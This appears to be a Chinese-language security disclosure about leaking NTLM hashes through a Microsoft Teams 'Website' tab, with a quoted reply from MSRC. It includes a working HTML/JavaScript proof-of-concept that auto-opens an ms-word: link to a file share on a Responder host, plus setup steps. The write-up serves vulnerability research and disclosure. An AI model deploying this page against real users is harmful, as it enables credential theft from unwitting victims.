当用户导航到一个“网站”选项卡,该选项卡指向一个特制网页时,可能会导致通过激活 Office URL 方案泄露 NTLM 哈希,从而将该过程简化为单次点击即可泄露。
如果用户尝试从浏览器打开格式为 ms-word:ofv|u|file://Share/File.docx 的链接,需要以下步骤:
1- 用户必须确认其打开 Word 的意图。
2- 用户必须确认并接受 MS Office 警告消息中所示的风险。
然而,在“网站”选项卡上,用户的操作被简化为仅需接受风险。
<html>
<head>
<title>Auto Open Document</title>
</head>
<body>
<a href="ms-word:ofv|u|file://ResponderIP_Or_MachineName/File.docx" id="autoOpenLink"></a>
<script>
window.onload = function() {
document.getElementById('autoOpenLink').click();
};
</script>
</body>
</html>
3. 在 Teams 中,设置一个指向你刚刚搭建的网页的“网站”选项卡。 4. 访问该“选项卡”。
当你访问该选项卡时,一个由 JavaScript 触发的链接会自动启动打开 Word。如果用户通过点击“是”同意 Word 中的提示,他们的 NTLM 哈希将被传输到“攻击者”的机器。

2024年3月27日(周三)20:23,Microsoft Security Response Center <[email protected]mailto:[[email protected]](mailto:[email protected])> 写道:
你好,
感谢你的提交。我们认定你的发现是有效的,但因其严重性较低,尚不符合立即处理的标准。我们的工程师指出,用户在 Word 或其他 Office 客户端中仍需同意后 NTLM 才会泄露,这降低了严重性。不过,我们已将你的发现标记为未来审查项,作为改进我们产品的机会,并作为一个待改进的功能问题。目前我没有该审查的时间表。由于此时无需进一步操作,我将关闭此案例。
此致,
MSRC
看起来已在 Microsoft Teams 版本 24033.813.2773.520. 中修复。